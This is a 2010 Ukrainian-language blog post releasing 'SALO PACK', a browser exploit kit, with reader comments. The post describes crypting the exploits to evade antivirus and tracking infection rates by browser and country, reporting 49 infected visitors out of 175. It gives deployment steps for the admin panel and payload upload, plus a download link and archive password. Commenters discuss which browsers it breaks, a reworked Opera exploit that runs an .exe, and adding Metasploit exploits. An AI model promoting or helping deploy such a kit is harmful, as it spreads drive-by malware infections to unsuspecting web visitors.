Home > Безпека, Експлоіти/Exploits, Кодинг > SALO PACK – Зв’язка сплойтів (exploit pack)

SALO PACK – Зв’язка сплойтів (exploit pack)

February 19th, 2010 Dimi4 Leave a comment Go to comments

SALO PACK © UASC

by n0153r, Dimi4

  • Даний програмний продукт призначений тільки для освітніх цілей. Використання його в будь-якому іншому
  • вигляді може бути розцінено як порушення закону!
  • Заборонено продаж і використання вихідного коду SALO PACK в комерційних цілях

Коротка характеристика:

  • Мультисистемна зв’язка експлойтів зі статистикою. (Написана з нуля)
  • Крипт коду експлойтів за технологією розробленою UASC. (n0153r)
  • Використання технології Sajax
  • Детальна статистика по країнах, пробивах, броузерах, операційних систах.
  • Підрахунок пробиу без необхідності використання ПЗ яке відвідує на URL статистики.
  • Абсолютно нічого не палиться АВ (Вже неактуально, тому зв’язка в пабліку)

На цей момент SALO PACK являє собою exploit pack з 6-и експлойтів.

Наступні дані надані станом на 10.07.2009 !

Кількість відвідувачів 175
Кількість заражених 49
Загальний пробив 28%
ІЕ заражених 97.96%

Встановлення:

  • Відредагуйте файл cfg.php у відповідності з вашими даними.
  • У файлі cfg.php рядок:
    $config_adminPass=md5("xek");
    замініть на
    $config_adminPass=ВАШ_ПАРОЛЬ_В_МД5
  • Завантажте всі файли з архіву на сервер.
  • Встановіть права 777 на файл cfg.php.
  • Запустіть скрипт sql.php.
  • Зайдіть в адмін-центр (/ admin /), перейдіть в меню “Установки”, і завантажте свій файл.

Скрін:

Завантажити: (Пароль – _roa_salopack)
http://uasc.org.ua/files/SALO_PACK_v_1.1.rar
P.S. from RoA with love ^_^. В пабліку тому, що більше не актуально.
Categories: Безпека, Експлоіти/Exploits, Кодинг Tags: , , ,
  1. wkar
    February 20th, 2010 at 20:33 | #1
    Reply | Quote

    Спасибо!

  2. 1vanu4
    February 20th, 2010 at 21:37 | #2
    Reply | Quote

    А які браузери пробиває?

  3. Dimi4
    February 20th, 2010 at 22:16 | #3
    Reply | Quote

    Пробивало осла, оперу, фф.

  4. ls-la
    March 2nd, 2010 at 18:48 | #4
    Reply | Quote

    имхо связка недоработана , проверил на нескольких старых браузерах, пишет что пробило, но на самом деле непробивает =[

  5. leny
    March 13th, 2010 at 17:51 | #5
    Reply | Quote

    Понравилась доработка opera:cache эксплоита, в стандартном poc бывали проблемы с запуском *.exe, и в консоле ошибок оставалась запись, что *.js начинается на MZP, здесь же использовали vbs, что позволило избавиться от этих проблем.

  6. Pernat1y
    June 6th, 2010 at 19:20 | #6
    Reply | Quote

    небольшой баг :)
    зашел в настройки связки, и переключил язык интерфэйса на русский (в конфиге стоял инглиш), после этого конфиг сбросился в дэфолт (пожалуй, кроме пароля).
    попробовал еще раз – конфиг все-равно сбрасывается в дэфолт при изменении настроек

    и еще в форме логина не работает Enter (в смысле кнопка на клавиатуре). приходиться нажимать мышой. пробовал и в опере и в лисе

  7. Dimi4
    June 6th, 2010 at 23:21 | #7
    Reply | Quote

    Pernat1y, дякуємо за інформацію, та, нажаль, ми вже не підтримуєм данний програмний продукт через його неактуальність.

  8. Pernat1y
    June 7th, 2010 at 09:54 | #8
    Reply | Quote

    @Dimi4
    а що заважає знову зробити його актуальним? :)
    чи хоча-б саму адмін-панель доробити/пофіксити

  9. Dimi4
    June 7th, 2010 at 10:05 | #9
    Reply | Quote

    @Pernat1y
    Відсутність нормальних експлойтів, та банально – брак часу.

  10. Pernat1y
    June 7th, 2010 at 11:07 | #10
    Reply | Quote

    @Dimi4
    ну, свіжі екплоїти з того-ж metasploit’a взяти. там нові досить швидко додаються та оновлюються.
    ps. сподіваюсь все-ж побачити нові версії. зв’язка має непоганий потенціал. в будь-якому випадку, дякую :)

  1. No trackbacks yet.